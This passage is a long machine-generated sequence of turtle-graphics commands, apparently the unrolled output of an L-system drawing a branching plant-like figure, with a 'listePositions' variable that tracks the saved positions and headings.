pd(), fd(8.0) ;
pu(), setposition((195.29,289.23)), setheading(45.0) ;
pu(), setposition((177.86,247.13)), setheading(67.5) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((192.64,253.25), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((192.64,253.25)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((192.64,253.25), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((192.64,253.25)), setheading(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((207.42,259.38), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((207.42,259.38)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((207.42,259.38), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((207.42,259.38)), setheading(22.5) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((207.42,259.38), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((207.42,259.38), 0.0), ((222.20,253.25), 315.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((222.20,253.25)), setheading(315.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((207.42,259.38), 0.0), ((222.20,253.25), 337.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((222.20,253.25)), setheading(337.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((207.42,259.38), 0.0), ((238.20,253.25), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((238.20,253.25)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((207.42,259.38), 0.0), ((238.20,253.25), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((238.20,253.25)), setheading(0.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((207.42,259.38), 0.0), ((252.99,259.38), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((252.99,259.38)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((207.42,259.38), 0.0), ((252.99,259.38), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((252.99,259.38)), setheading(22.5) ;
pu(), setposition((207.42,259.38)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((207.42,259.38), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((207.42,259.38), 22.5), ((218.74,270.69), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((218.74,270.69)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((207.42,259.38), 22.5), ((218.74,270.69), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((218.74,270.69)), setheading(45.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((207.42,259.38), 22.5), ((233.52,276.81), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((233.52,276.81)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((207.42,259.38), 22.5), ((233.52,276.81), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((233.52,276.81)), setheading(22.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((207.42,259.38), 22.5), ((249.52,276.81), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((249.52,276.81)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((207.42,259.38), 22.5), ((249.52,276.81), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((249.52,276.81)), setheading(0.0) ;
pu(), setposition((207.42,259.38)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((218.74,270.69), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((218.74,270.69)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((218.74,270.69), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((218.74,270.69)), setheading(45.0) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((230.05,282.00), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((230.05,282.00)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((230.05,282.00), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((230.05,282.00)), setheading(45.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((230.05,282.00), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((230.05,282.00), 22.5), ((246.05,282.00), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((246.05,282.00)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((230.05,282.00), 22.5), ((246.05,282.00), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((246.05,282.00)), setheading(0.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((230.05,282.00), 22.5), ((260.83,288.13), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((260.83,288.13)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((230.05,282.00), 22.5), ((260.83,288.13), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((260.83,288.13)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((230.05,282.00), 22.5), ((272.15,299.44), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((272.15,299.44)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((230.05,282.00), 22.5), ((272.15,299.44), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((272.15,299.44)), setheading(45.0) ;
pu(), setposition((230.05,282.00)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((230.05,282.00), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((230.05,282.00), 45.0), ((236.17,296.79), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((236.17,296.79)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((230.05,282.00), 45.0), ((236.17,296.79), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((236.17,296.79)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((230.05,282.00), 45.0), ((247.49,308.10), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((247.49,308.10)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((230.05,282.00), 45.0), ((247.49,308.10), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((247.49,308.10)), setheading(45.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((230.05,282.00), 45.0), ((262.27,314.22), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((262.27,314.22)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((230.05,282.00), 45.0), ((262.27,314.22), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((262.27,314.22)), setheading(22.5) ;
pu(), setposition((230.05,282.00)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((236.17,296.79), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((236.17,296.79)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((236.17,296.79), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((236.17,296.79)), setheading(67.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((242.30,311.57), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((242.30,311.57)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((242.30,311.57), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((242.30,311.57)), setheading(67.5) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((242.30,311.57), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((242.30,311.57), 45.0), ((257.08,317.69), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((257.08,317.69)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((242.30,311.57), 45.0), ((257.08,317.69), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((257.08,317.69)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((242.30,311.57), 45.0), ((268.39,329.01), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((268.39,329.01)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((242.30,311.57), 45.0), ((268.39,329.01), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((268.39,329.01)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((242.30,311.57), 45.0), ((274.51,343.79), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((274.51,343.79)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((242.30,311.57), 45.0), ((274.51,343.79), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((274.51,343.79)), setheading(67.5) ;
pu(), setposition((242.30,311.57)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((242.30,311.57), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((242.30,311.57), 67.5), ((242.30,327.57), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((242.30,327.57)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((242.30,311.57), 67.5), ((242.30,327.57), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((242.30,327.57)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((242.30,311.57), 67.5), ((248.42,342.35), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((248.42,342.35)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((242.30,311.57), 67.5), ((248.42,342.35), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((248.42,342.35)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((242.30,311.57), 67.5), ((259.73,353.66), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((259.73,353.66)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 45.0), ((242.30,311.57), 67.5), ((259.73,353.66), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((259.73,353.66)), setheading(45.0) ;
pu(), setposition((242.30,311.57)), setheading(67.5) ;
pu(), setposition((177.86,247.13)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((177.86,263.13), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((177.86,263.13)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((177.86,263.13), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((177.86,263.13)), setheading(90.0) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((177.86,279.13), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((177.86,279.13)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((177.86,279.13), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((177.86,279.13)), setheading(90.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((177.86,279.13), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((177.86,279.13), 67.5), ((189.17,290.45), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((189.17,290.45)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((177.86,279.13), 67.5), ((189.17,290.45), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((189.17,290.45)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((177.86,279.13), 67.5), ((195.29,305.23), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((195.29,305.23)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((177.86,279.13), 67.5), ((195.29,305.23), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((195.29,305.23)), setheading(67.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((177.86,279.13), 67.5), ((195.29,321.23), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((195.29,321.23)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((177.86,279.13), 67.5), ((195.29,321.23), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((195.29,321.23)), setheading(90.0) ;
pu(), setposition((177.86,279.13)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((177.86,279.13), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((177.86,279.13), 90.0), ((171.74,293.91), 90.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((171.74,293.91)), setheading(90.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((177.86,279.13), 90.0), ((171.74,293.91), 112.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((171.74,293.91)), setheading(112.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((177.86,279.13), 90.0), ((171.74,309.91), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((171.74,309.91)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((177.86,279.13), 90.0), ((171.74,309.91), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((171.74,309.91)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((177.86,279.13), 90.0), ((177.86,324.70), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((177.86,324.70)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((177.86,279.13), 90.0), ((177.86,324.70), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((177.86,324.70)), setheading(67.5) ;
pu(), setposition((177.86,279.13)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((183.98,293.91), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((183.98,293.91)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((183.98,293.91), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((183.98,293.91)), setheading(67.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((190.10,308.70), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((190.10,308.70)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((190.10,308.70), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((190.10,308.70)), setheading(67.5) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((190.10,308.70), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((190.10,308.70), 45.0), ((204.89,314.82), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((204.89,314.82)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((190.10,308.70), 45.0), ((204.89,314.82), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((204.89,314.82)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((190.10,308.70), 45.0), ((216.20,326.13), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((216.20,326.13)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((190.10,308.70), 45.0), ((216.20,326.13), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((216.20,326.13)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((190.10,308.70), 45.0), ((222.32,340.91), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((222.32,340.91)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((177.86,247.13), 67.5), ((190.10,308.70), 45.0), ((222.32,340.91), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((222.32,340.91)), setheading(67.5) ;
pu(), setposition((190.10,308.70)), setheading(45.0) ;
left(22.5) ;
